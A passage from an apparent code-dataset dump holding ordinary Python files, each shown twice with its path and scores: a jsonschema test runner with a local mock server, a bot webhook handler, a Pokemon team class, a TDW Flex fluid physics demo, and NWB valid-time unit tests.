delay *= EXPONENTIAL_BASE
delay += random.uniform(*JITTER)
sleep(delay)
raise RuntimeError(f"{url} is not available")
@pytest.fixture(scope="session", autouse=True)
def mock_server():
process = subprocess.Popen(args=[sys.executable, f"{TEST_SUITE_PATH}/bin/jsonschema_suite", "serve"])
wait_until_responsive("http://127.0.0.1:1234")
try:
yield
finally:
process.terminate()
SUPPORTED_DRAFTS = (4, 6, 7)
NOT_SUPPORTED_CASES = {
4: ("bignum.json", "email.json"),
6: ("bignum.json", "email.json"),
7: ("bignum.json", "email.json", "idn-hostname.json"),
}
def load_file(path):
with open(path, mode="r", encoding="utf-8") as fd:
for block in json.load(fd):
yield block
def maybe_optional(draft, schema, instance, expected, description, filename):
output = (filename, draft, schema, instance, expected, description)
if filename in NOT_SUPPORTED_CASES.get(draft, ()):
output = pytest.param(*output, marks=pytest.mark.skip(reason=f"{filename} is not supported"))
return output
def pytest_generate_tests(metafunc):
cases = [
maybe_optional(draft, block["schema"], test["data"], test["valid"], test["description"], filename)
for draft in SUPPORTED_DRAFTS
for root, dirs, files in os.walk(f"{TEST_SUITE_PATH}/tests/draft{draft}/")
for filename in files
for block in load_file(os.path.join(root, filename))
for test in block["tests"]
]
metafunc.parametrize("filename, draft, schema, instance, expected, description", cases)
def test_draft(filename, draft, schema, instance, expected, description):
error_message = f"[{filename}] {description}: {schema} | {instance}"
try:
result = jsonschema_rs.is_valid(schema, instance, int(draft))
assert result is expected, error_message
except ValueError:
pytest.fail(error_message)
|
bindings/python/tests-py/test_suite.py
|
import json
import os
import random
import socket
import subprocess
import sys
from time import sleep
from urllib.parse import urlparse
import pytest
import jsonschema_rs
TEST_SUITE_PATH = "../../jsonschema/tests/suite"
EXPONENTIAL_BASE = 2
JITTER = (0.0, 0.5)
INITIAL_RETRY_DELAY = 0.05
MAX_WAITING_RETRIES = 10
def is_available(url: str) -> bool:
"""Whether the `url` is available for connection or not."""
parsed = urlparse(url)
try:
with socket.create_connection((parsed.hostname, parsed.port or 80)):
return True
except ConnectionError:
return False
def wait_until_responsive(url: str, retries: int = MAX_WAITING_RETRIES, delay: float = INITIAL_RETRY_DELAY) -> None:
while retries > 0:
if is_available(url):
return
retries -= 1
delay *= EXPONENTIAL_BASE
delay += random.uniform(*JITTER)
sleep(delay)
raise RuntimeError(f"{url} is not available")
@pytest.fixture(scope="session", autouse=True)
def mock_server():
process = subprocess.Popen(args=[sys.executable, f"{TEST_SUITE_PATH}/bin/jsonschema_suite", "serve"])
wait_until_responsive("http://127.0.0.1:1234")
try:
yield
finally:
process.terminate()
SUPPORTED_DRAFTS = (4, 6, 7)
NOT_SUPPORTED_CASES = {
4: ("bignum.json", "email.json"),
6: ("bignum.json", "email.json"),
7: ("bignum.json", "email.json", "idn-hostname.json"),
}
def load_file(path):
with open(path, mode="r", encoding="utf-8") as fd:
for block in json.load(fd):
yield block
def maybe_optional(draft, schema, instance, expected, description, filename):
output = (filename, draft, schema, instance, expected, description)
if filename in NOT_SUPPORTED_CASES.get(draft, ()):
output = pytest.param(*output, marks=pytest.mark.skip(reason=f"{filename} is not supported"))
return output
def pytest_generate_tests(metafunc):
cases = [
maybe_optional(draft, block["schema"], test["data"], test["valid"], test["description"], filename)
for draft in SUPPORTED_DRAFTS
for root, dirs, files in os.walk(f"{TEST_SUITE_PATH}/tests/draft{draft}/")
for filename in files
for block in load_file(os.path.join(root, filename))
for test in block["tests"]
]
metafunc.parametrize("filename, draft, schema, instance, expected, description", cases)
def test_draft(filename, draft, schema, instance, expected, description):
error_message = f"[{filename}] {description}: {schema} | {instance}"
try:
result = jsonschema_rs.is_valid(schema, instance, int(draft))
assert result is expected, error_message
except ValueError:
pytest.fail(error_message)
| 0.334916 | 0.16455 |
from aiohttp import web
import asyncio
import asyncio.tasks
import datetime
import functools
import logging
import itertools
import typing
import json
from ..models import Update
from ..utils import helper
DEFAULT_WEB_PATH = '/webhook'
DEFAULT_ROUTE_NAME = 'webhook_handler'
BOT_DISPATCHER_KEY = 'BOT_DISPATCHER'
RESPONSE_TIMEOUT = 55
WEBHOOK = 'webhook'
WEBHOOK_CONNECTION = 'WEBHOOK_CONNECTION'
WEBHOOK_REQUEST = 'WEBHOOK_REQUEST'
log = logging.getLogger(__name__)
class PyAituWarning(Warning):
pass
class TimeoutWarning(PyAituWarning):
pass
class WebhookRequestHandler(web.View):
"""
Simple Wehhook request handler for aiohttp web server.
You need to register that in app:
.. code-block:: python3
app.router.add_route('*', '/your/webhook/path', WebhookRequestHandler, name='webhook_handler')
But first you need to configure application for getting Dispatcher instance from request handler!
It must always be with key 'BOT_DISPATCHER'
.. code-block:: python3
bot = Bot(TOKEN, loop)
dp = Dispatcher(bot)
app['BOT_DISPATCHER'] = dp
"""
def get_dispatcher(self):
"""
Get Dispatcher instance from environment
:return: :class:`aiogram.Dispatcher`
"""
return self.request.app[BOT_DISPATCHER_KEY]
async def parse_updates(self):
"""
Read updates from stream and deserialize it.
"""
data = await self.request.json()
updates = []
for jsonUpdate in data['updates']:
update = Update(jsonUpdate)
updates.append(update)
return updates
async def post(self):
"""
Process POST request
if one of handler returns instance of :class:`aiogram.dispatcher.webhook.BaseResponse` return it to webhook.
Otherwise do nothing (return 'ok')
:return: :class:`aiohttp.web.Response`
"""
updates = await self.parse_updates()
for update in updates:
dispatcher = self.get_dispatcher()
await dispatcher.updates_handler.notify(update)
return web.Response(text='{"updates":[]}', content_type='application/json')
async def get(self):
return web.Response(text='')
async def head(self):
return web.Response(text='')
class BaseResponse:
"""
Base class for webhook responses.
"""
@property
def method(self) -> str:
"""
In all subclasses of that class you need to override this property
:return: str
"""
raise NotImplementedError
def prepare(self) -> typing.Dict:
"""
You need to override this method.
:return: response parameters dict
"""
raise NotImplementedError
def cleanup(self) -> typing.Dict:
"""
Cleanup response after preparing. Remove empty fields.
:return: response parameters dict
"""
return {k: v for k, v in self.prepare().items() if v is not None}
def get_response(self):
"""
Get response object
:return:
"""
return {'method': self.method, **self.cleanup()}
def get_web_response(self):
"""
Get prepared web response with JSON data.
:return: :class:`aiohttp.web.Response`
"""
return web.json_response(self.get_response(), dumps=json.dumps)
async def execute_response(self, bot):
"""
Use this method if you want to execute response as simple HTTP request.
:param bot: Bot instance.
:return:
"""
method_name = helper.HelperMode.apply(self.method, helper.HelperMode.snake_case)
method = getattr(bot, method_name, None)
if method:
return await method(**self.cleanup())
return await bot.request(self.method, self.cleanup())
async def __call__(self, bot=None):
return await self.execute_response(bot)
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
return await self()
|
pyAitu/dispatcher/webhook.py
|
from aiohttp import web
import asyncio
import asyncio.tasks
import datetime
import functools
import logging
import itertools
import typing
import json
from ..models import Update
from ..utils import helper
DEFAULT_WEB_PATH = '/webhook'
DEFAULT_ROUTE_NAME = 'webhook_handler'
BOT_DISPATCHER_KEY = 'BOT_DISPATCHER'
RESPONSE_TIMEOUT = 55
WEBHOOK = 'webhook'
WEBHOOK_CONNECTION = 'WEBHOOK_CONNECTION'
WEBHOOK_REQUEST = 'WEBHOOK_REQUEST'
log = logging.getLogger(__name__)
class PyAituWarning(Warning):
pass
class TimeoutWarning(PyAituWarning):
pass
class WebhookRequestHandler(web.View):
"""
Simple Wehhook request handler for aiohttp web server.
You need to register that in app:
.. code-block:: python3
app.router.add_route('*', '/your/webhook/path', WebhookRequestHandler, name='webhook_handler')
But first you need to configure application for getting Dispatcher instance from request handler!
It must always be with key 'BOT_DISPATCHER'
.. code-block:: python3
bot = Bot(TOKEN, loop)
dp = Dispatcher(bot)
app['BOT_DISPATCHER'] = dp
"""
def get_dispatcher(self):
"""
Get Dispatcher instance from environment
:return: :class:`aiogram.Dispatcher`
"""
return self.request.app[BOT_DISPATCHER_KEY]
async def parse_updates(self):
"""
Read updates from stream and deserialize it.
"""
data = await self.request.json()
updates = []
for jsonUpdate in data['updates']:
update = Update(jsonUpdate)
updates.append(update)
return updates
async def post(self):
"""
Process POST request
if one of handler returns instance of :class:`aiogram.dispatcher.webhook.BaseResponse` return it to webhook.
Otherwise do nothing (return 'ok')
:return: :class:`aiohttp.web.Response`
"""
updates = await self.parse_updates()
for update in updates:
dispatcher = self.get_dispatcher()
await dispatcher.updates_handler.notify(update)
return web.Response(text='{"updates":[]}', content_type='application/json')
async def get(self):
return web.Response(text='')
async def head(self):
return web.Response(text='')
class BaseResponse:
"""
Base class for webhook responses.
"""
@property
def method(self) -> str:
"""
In all subclasses of that class you need to override this property
:return: str
"""
raise NotImplementedError
def prepare(self) -> typing.Dict:
"""
You need to override this method.
:return: response parameters dict
"""
raise NotImplementedError
def cleanup(self) -> typing.Dict:
"""
Cleanup response after preparing. Remove empty fields.
:return: response parameters dict
"""
return {k: v for k, v in self.prepare().items() if v is not None}
def get_response(self):
"""
Get response object
:return:
"""
return {'method': self.method, **self.cleanup()}
def get_web_response(self):
"""
Get prepared web response with JSON data.
:return: :class:`aiohttp.web.Response`
"""
return web.json_response(self.get_response(), dumps=json.dumps)
async def execute_response(self, bot):
"""
Use this method if you want to execute response as simple HTTP request.
:param bot: Bot instance.
:return:
"""
method_name = helper.HelperMode.apply(self.method, helper.HelperMode.snake_case)
method = getattr(bot, method_name, None)
if method:
return await method(**self.cleanup())
return await bot.request(self.method, self.cleanup())
async def __call__(self, bot=None):
return await self.execute_response(bot)
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
return await self()
| 0.534612 | 0.093885 |
import asyncio
from typing import List
from readchar import *
from api import pokeapi
from config.config import TEXT
from game.pokemon import Pokemon
class Player:
"""Holds current information about the player"""
team: List[Pokemon] = []
def __init__(self):
"""Fills the player's team with a random Pokemon from the PokeAPI"""
self.add_to_team(asyncio.run(pokeapi.get_random_pokemon_from_api()))
# self.team.extend(asyncio.run(pokeapi.get_random_pokemons_from_api(2)))
def add_to_team(self, pokemon: Pokemon):
"""Add a pokemon to the user's team and inform the user"""
self.team.append(pokemon)
print(f"{pokemon.name} {TEXT['POKEMON']['ADD']}")
def remove_from_team(self):
"""Prompts user to remove a pokemon from the user's team"""
is_tossing = True
while is_tossing:
if len(self.team) <= 1:
print(TEXT["TEAM"]["SIZE_ERROR"], end="\n" * 2)
is_tossing = False
else:
print(TEXT["TEAM"]["TOSS"])
print(
*[f"{str(i+1)}. {slot.name}" for i, slot in enumerate(self.team)],
sep="\n",
)
print(TEXT["TEAM"]["EXIT"], end="\n" * 2)
is_tossing = self.__attempt_toss()
def __attempt_toss(self) -> bool:
"""Receives user input and attempts to toss a pokemon"""
try:
choice = readkey()
player_toss_index = int(choice) - 1
player_toss_choice = self.team[player_toss_index]
if player_toss_index < 0:
raise IndexError
print(
f"{player_toss_choice.name} {TEXT['TEAM']['RESULT']} {player_toss_choice.name}!",
end="\n" * 2,
)
self.team.pop(player_toss_index)
return False
except IndexError:
# Index not found in team
print(TEXT["TEAM"]["EXIST_ERROR"], end="\n" * 2)
return True
except ValueError:
# Key other than number was pressed
return False
def print_team(self):
"""Prints a formatted table of the player's team"""
header = "{:4} {:^11} {:6} {:^9}{:^9}".format(
"No.", "Name", "Health", "Type", "Type 2"
)
print(header)
print(*[str(pokemon) for pokemon in self.team], sep="\n", end="\n" * 2)
"""Global Player instance"""
PLAYER = Player()
|
game/player.py
|
import asyncio
from typing import List
from readchar import *
from api import pokeapi
from config.config import TEXT
from game.pokemon import Pokemon
class Player:
"""Holds current information about the player"""
team: List[Pokemon] = []
def __init__(self):
"""Fills the player's team with a random Pokemon from the PokeAPI"""
self.add_to_team(asyncio.run(pokeapi.get_random_pokemon_from_api()))
# self.team.extend(asyncio.run(pokeapi.get_random_pokemons_from_api(2)))
def add_to_team(self, pokemon: Pokemon):
"""Add a pokemon to the user's team and inform the user"""
self.team.append(pokemon)
print(f"{pokemon.name} {TEXT['POKEMON']['ADD']}")
def remove_from_team(self):
"""Prompts user to remove a pokemon from the user's team"""
is_tossing = True
while is_tossing:
if len(self.team) <= 1:
print(TEXT["TEAM"]["SIZE_ERROR"], end="\n" * 2)
is_tossing = False
else:
print(TEXT["TEAM"]["TOSS"])
print(
*[f"{str(i+1)}. {slot.name}" for i, slot in enumerate(self.team)],
sep="\n",
)
print(TEXT["TEAM"]["EXIT"], end="\n" * 2)
is_tossing = self.__attempt_toss()
def __attempt_toss(self) -> bool:
"""Receives user input and attempts to toss a pokemon"""
try:
choice = readkey()
player_toss_index = int(choice) - 1
player_toss_choice = self.team[player_toss_index]
if player_toss_index < 0:
raise IndexError
print(
f"{player_toss_choice.name} {TEXT['TEAM']['RESULT']} {player_toss_choice.name}!",
end="\n" * 2,
)
self.team.pop(player_toss_index)
return False
except IndexError:
# Index not found in team
print(TEXT["TEAM"]["EXIST_ERROR"], end="\n" * 2)
return True
except ValueError:
# Key other than number was pressed
return False
def print_team(self):
"""Prints a formatted table of the player's team"""
header = "{:4} {:^11} {:6} {:^9}{:^9}".format(
"No.", "Name", "Health", "Type", "Type 2"
)
print(header)
print(*[str(pokemon) for pokemon in self.team], sep="\n", end="\n" * 2)
"""Global Player instance"""
PLAYER = Player()
| 0.605216 | 0.318591 |
from tdw.controller import Controller
from tdw.tdw_utils import TDWUtils
from time import sleep
from platform import system
"""
Create a fluid "container" with the NVIDIA Flex physics engine. Run several trials, dropping ball objects of increasing mass into the fluid.
"""
class FlexFluid(Controller):
def run(self):
if system() != "Windows":
raise Exception("Flex fluids are only supported in Windows (see Documentation/misc_frontend/flex.md)")
self.load_streamed_scene(scene="tdw_room")
# Create the container, set up for fluids.
self.communicate({"$type": "create_flex_container",
"collision_distance": 0.04,
"static_friction": 0.1,
"dynamic_friction": 0.1,
"particle_friction": 0.1,
"viscocity": 0.001,
"cohesion": 0.0015,
"radius": 0.1,
"fluid_rest": 0.05,
"damping": 0.01,
"substep_count": 5,
"iteration_count": 5,
"buoyancy": 1.0})
# Slow down physics so the water can settle without splashing out of the container.
self.communicate({"$type": "set_time_step", "time_step": 0.005})
# Create the avatar.
self.communicate(TDWUtils.create_avatar(position={"x": -3.75, "y": 1.5, "z": -0.5}, look_at={"x": 0, "y": 0, "z": 0}))
# Load a pool container for the fluid.
self.pool_id = self.add_object("fluid_receptacle1x1", position={"x": -0.35, "y": 0, "z": 0}, rotation={"x": 0, "y": 0, "z": 0}, library="models_special.json")
self.communicate([{"$type": "scale_object", "id": self.pool_id, "scale_factor": {"x": 2.0, "y": 2.0, "z":2.0}}, {"$type": "set_kinematic_state", "id": self.pool_id, "is_kinematic": True, "use_gravity": False}])
# Add the fluid actor, using the FluidPrimitive.
self.fluid_id = self.get_unique_id()
self.communicate({"$type": "load_flex_fluid_from_resources", "id": self.fluid_id, "orientation": {"x": 0, "y": 0, "z": 0}, "position": {"x": -0.35, "y": 1.0, "z": 0}})
# Assign the actor's container and set the Flex scale (this MUST be done, even if the scale is 1,1,1).
self.communicate([{"$type": "create_flex_fluid_object",
"id": self.fluid_id,
"mass_scale": 1.0,
"particle_spacing": 0.05},
{"$type": "assign_flex_container",
"id": self.fluid_id,
"container_id": 0, "fluid_container": True}
])
# Pause for a while to look at the container while it fills with water (this is not required, simply for demo purposes).
for i in range(500):
# Look at the object.
self.communicate({"$type": "look_at",
"avatar_id": "a",
"object_id": self.pool_id,
"use_centroid": True})
# Set physics back to a normal rate, for the trials.
self.communicate({"$type": "set_time_step", "time_step": 0.03})
# Set up the data for five "trials" and run them.
masses = [1.25, 2.5, 4.0, 6.65, 8.5]
heights = [3.0, 3.0, 3.0, 3.0, 3.0]
stim_times = [170, 170, 170, 170, 170]
pause_times = [0.1, 0.1, 0.1, 0.1, 0.1]
for mass, height, stim_time, pause_time in zip(masses, heights, stim_times, pause_times):
self.do_trial(mass, height, stim_time, pause_time)
def do_trial(self, obj_mass: float, height: float, stim_time: int, pause_time: int):
# Add the sphere object.
sphere_id = self.add_object("prim_sphere", position={"x": 0, "y": height, "z": 0}, rotation={"x": 0, "y": 0, "z": 0}, library="models_special.json")
self.communicate([{"$type": "scale_object", "id": sphere_id, "scale_factor": {"x": 0.4, "y": 0.4, "z": 0.4}}, {"$type": "set_kinematic_state", "id": sphere_id}])
# Set the object to kinematic.
# Set the solid actor.
# Assign the actor's container.
self.communicate([
{"$type": "set_flex_solid_actor",
"id": sphere_id,
"mass_scale": obj_mass,
"particle_spacing": 0.05},
{"$type": "assign_flex_container",
"id": sphere_id,
"container_id": 0}
])
# Look a the pool for the passed-in "look" time.
for i in range(stim_time):
# Look at the object.
self.communicate({"$type": "look_at",
"avatar_id": "a",
"object_id": self.pool_id,
"use_centroid": True})
# Destroy the object and pause for the passed-in pause time.
self.communicate({"$type": "destroy_object", "id": sphere_id})
sleep(pause_time)
if __name__ == "__main__":
FlexFluid().run()
|
Python/example_controllers/flex_fluid_object.py
|
from tdw.controller import Controller
from tdw.tdw_utils import TDWUtils
from time import sleep
from platform import system
"""
Create a fluid "container" with the NVIDIA Flex physics engine. Run several trials, dropping ball objects of increasing mass into the fluid.
"""
class FlexFluid(Controller):
def run(self):
if system() != "Windows":
raise Exception("Flex fluids are only supported in Windows (see Documentation/misc_frontend/flex.md)")
self.load_streamed_scene(scene="tdw_room")
# Create the container, set up for fluids.
self.communicate({"$type": "create_flex_container",
"collision_distance": 0.04,
"static_friction": 0.1,
"dynamic_friction": 0.1,
"particle_friction": 0.1,
"viscocity": 0.001,
"cohesion": 0.0015,
"radius": 0.1,
"fluid_rest": 0.05,
"damping": 0.01,
"substep_count": 5,
"iteration_count": 5,
"buoyancy": 1.0})
# Slow down physics so the water can settle without splashing out of the container.
self.communicate({"$type": "set_time_step", "time_step": 0.005})
# Create the avatar.
self.communicate(TDWUtils.create_avatar(position={"x": -3.75, "y": 1.5, "z": -0.5}, look_at={"x": 0, "y": 0, "z": 0}))
# Load a pool container for the fluid.
self.pool_id = self.add_object("fluid_receptacle1x1", position={"x": -0.35, "y": 0, "z": 0}, rotation={"x": 0, "y": 0, "z": 0}, library="models_special.json")
self.communicate([{"$type": "scale_object", "id": self.pool_id, "scale_factor": {"x": 2.0, "y": 2.0, "z":2.0}}, {"$type": "set_kinematic_state", "id": self.pool_id, "is_kinematic": True, "use_gravity": False}])
# Add the fluid actor, using the FluidPrimitive.
self.fluid_id = self.get_unique_id()
self.communicate({"$type": "load_flex_fluid_from_resources", "id": self.fluid_id, "orientation": {"x": 0, "y": 0, "z": 0}, "position": {"x": -0.35, "y": 1.0, "z": 0}})
# Assign the actor's container and set the Flex scale (this MUST be done, even if the scale is 1,1,1).
self.communicate([{"$type": "create_flex_fluid_object",
"id": self.fluid_id,
"mass_scale": 1.0,
"particle_spacing": 0.05},
{"$type": "assign_flex_container",
"id": self.fluid_id,
"container_id": 0, "fluid_container": True}
])
# Pause for a while to look at the container while it fills with water (this is not required, simply for demo purposes).
for i in range(500):
# Look at the object.
self.communicate({"$type": "look_at",
"avatar_id": "a",
"object_id": self.pool_id,
"use_centroid": True})
# Set physics back to a normal rate, for the trials.
self.communicate({"$type": "set_time_step", "time_step": 0.03})
# Set up the data for five "trials" and run them.
masses = [1.25, 2.5, 4.0, 6.65, 8.5]
heights = [3.0, 3.0, 3.0, 3.0, 3.0]
stim_times = [170, 170, 170, 170, 170]
pause_times = [0.1, 0.1, 0.1, 0.1, 0.1]
for mass, height, stim_time, pause_time in zip(masses, heights, stim_times, pause_times):
self.do_trial(mass, height, stim_time, pause_time)
def do_trial(self, obj_mass: float, height: float, stim_time: int, pause_time: int):
# Add the sphere object.
sphere_id = self.add_object("prim_sphere", position={"x": 0, "y": height, "z": 0}, rotation={"x": 0, "y": 0, "z": 0}, library="models_special.json")
self.communicate([{"$type": "scale_object", "id": sphere_id, "scale_factor": {"x": 0.4, "y": 0.4, "z": 0.4}}, {"$type": "set_kinematic_state", "id": sphere_id}])
# Set the object to kinematic.
# Set the solid actor.
# Assign the actor's container.
self.communicate([
{"$type": "set_flex_solid_actor",
"id": sphere_id,
"mass_scale": obj_mass,
"particle_spacing": 0.05},
{"$type": "assign_flex_container",
"id": sphere_id,
"container_id": 0}
])
# Look a the pool for the passed-in "look" time.
for i in range(stim_time):
# Look at the object.
self.communicate({"$type": "look_at",
"avatar_id": "a",
"object_id": self.pool_id,
"use_centroid": True})
# Destroy the object and pause for the passed-in pause time.
self.communicate({"$type": "destroy_object", "id": sphere_id})
sleep(pause_time)
if __name__ == "__main__":
FlexFluid().run()
| 0.623033 | 0.353596 |
from unittest import TestCase
from unittest.mock import MagicMock
import numpy as np
from pynwb import NWBFile
from testfixtures import should_raise
from rec_to_nwb.processing.exceptions.missing_data_exception import MissingDataException
from rec_to_nwb.processing.nwb.components.mda.time.valid.fl_mda_valid_time_manager import FlMdaValidTimeManager
class TestMdaValidTimeManager(TestCase):
def test_fl_mda_valid_time_manager_not_initialized_due_to_None_param(self):
with self.assertRaises(TypeError):
FlMdaValidTimeManager(None)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_with_gap_in_middle(self):
sampling_rate = 1.0
gaps_margin = 0.0001
mock_array = np.ndarray(dtype='float', shape=[10,])
array = [1, 2, 3, 4, 5, 7, 9, 10, 11, 12]
for i, number in enumerate(array):
mock_array[i] = number
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = mock_array
mock_metadata = {}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_times = fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
self.assertEqual(len(fl_mda_valid_times), 2)
self.assertEqual(round(fl_mda_valid_times[0].start_time, 4), 1.0001)
self.assertEqual(round(fl_mda_valid_times[0].stop_time, 4), 4.9999)
self.assertEqual(round(fl_mda_valid_times[1].start_time, 4), 9.0001)
self.assertEqual(round(fl_mda_valid_times[1].stop_time, 4), 11.9999)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_without_gap(self):
sampling_rate = 1.0
gaps_margin = 0.0001
mock_array = np.ndarray(dtype='float', shape=[10,])
array = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
for i, number in enumerate(array):
mock_array[i] = number
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = mock_array
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_times = fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
self.assertEqual(len(fl_mda_valid_times), 1)
self.assertEqual(round(fl_mda_valid_times[0].start_time, 4), 1.0001)
self.assertEqual(round(fl_mda_valid_times[0].stop_time, 4), 9.9999)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_with_gap_at_start(self):
sampling_rate = 1.0
gaps_margin = 0.0001
mock_array = np.ndarray(dtype='float', shape=[10,])
array = [1, 3, 5, 6, 7, 8, 9, 10, 11, 12]
for i, number in enumerate(array):
mock_array[i] = number
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = mock_array
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_times = fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
self.assertEqual(len(fl_mda_valid_times), 1)
self.assertEqual(round(fl_mda_valid_times[0].start_time, 4), 5.0001)
self.assertEqual(round(fl_mda_valid_times[0].stop_time, 4), 11.9999)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_with_gap_at_end(self):
sampling_rate = 1.0
gaps_margin = 0.0001
mock_array = np.ndarray(dtype='float', shape=[10, ])
array = [1, 2, 3, 4, 5, 6, 7, 8, 10, 12]
for i, number in enumerate(array):
mock_array[i] = number
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = mock_array
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_times = fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
self.assertEqual(len(fl_mda_valid_times), 1)
self.assertEqual(round(fl_mda_valid_times[0].start_time, 4), 1.0001)
self.assertEqual(round(fl_mda_valid_times[0].stop_time, 4), 7.9999)
@should_raise(TypeError)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_failed_due_to_None_param(self):
gaps_margin = 0.0001
sampling_rate = 1.0
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=None,
gaps_margin=gaps_margin
)
@should_raise(MissingDataException)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_failed_due_to_lack_of_timestamps(self):
gaps_margin = 0.0001
sampling_rate = 1.0
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = None
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
|
rec_to_nwb/test/processing/mda/time/valid/test_flMdaValidTimeManager.py
|
from unittest import TestCase
from unittest.mock import MagicMock
import numpy as np
from pynwb import NWBFile
from testfixtures import should_raise
from rec_to_nwb.processing.exceptions.missing_data_exception import MissingDataException
from rec_to_nwb.processing.nwb.components.mda.time.valid.fl_mda_valid_time_manager import FlMdaValidTimeManager
class TestMdaValidTimeManager(TestCase):
def test_fl_mda_valid_time_manager_not_initialized_due_to_None_param(self):
with self.assertRaises(TypeError):
FlMdaValidTimeManager(None)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_with_gap_in_middle(self):
sampling_rate = 1.0
gaps_margin = 0.0001
mock_array = np.ndarray(dtype='float', shape=[10,])
array = [1, 2, 3, 4, 5, 7, 9, 10, 11, 12]
for i, number in enumerate(array):
mock_array[i] = number
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = mock_array
mock_metadata = {}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_times = fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
self.assertEqual(len(fl_mda_valid_times), 2)
self.assertEqual(round(fl_mda_valid_times[0].start_time, 4), 1.0001)
self.assertEqual(round(fl_mda_valid_times[0].stop_time, 4), 4.9999)
self.assertEqual(round(fl_mda_valid_times[1].start_time, 4), 9.0001)
self.assertEqual(round(fl_mda_valid_times[1].stop_time, 4), 11.9999)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_without_gap(self):
sampling_rate = 1.0
gaps_margin = 0.0001
mock_array = np.ndarray(dtype='float', shape=[10,])
array = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
for i, number in enumerate(array):
mock_array[i] = number
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = mock_array
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_times = fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
self.assertEqual(len(fl_mda_valid_times), 1)
self.assertEqual(round(fl_mda_valid_times[0].start_time, 4), 1.0001)
self.assertEqual(round(fl_mda_valid_times[0].stop_time, 4), 9.9999)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_with_gap_at_start(self):
sampling_rate = 1.0
gaps_margin = 0.0001
mock_array = np.ndarray(dtype='float', shape=[10,])
array = [1, 3, 5, 6, 7, 8, 9, 10, 11, 12]
for i, number in enumerate(array):
mock_array[i] = number
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = mock_array
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_times = fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
self.assertEqual(len(fl_mda_valid_times), 1)
self.assertEqual(round(fl_mda_valid_times[0].start_time, 4), 5.0001)
self.assertEqual(round(fl_mda_valid_times[0].stop_time, 4), 11.9999)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_with_gap_at_end(self):
sampling_rate = 1.0
gaps_margin = 0.0001
mock_array = np.ndarray(dtype='float', shape=[10, ])
array = [1, 2, 3, 4, 5, 6, 7, 8, 10, 12]
for i, number in enumerate(array):
mock_array[i] = number
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = mock_array
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_times = fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
self.assertEqual(len(fl_mda_valid_times), 1)
self.assertEqual(round(fl_mda_valid_times[0].start_time, 4), 1.0001)
self.assertEqual(round(fl_mda_valid_times[0].stop_time, 4), 7.9999)
@should_raise(TypeError)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_failed_due_to_None_param(self):
gaps_margin = 0.0001
sampling_rate = 1.0
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
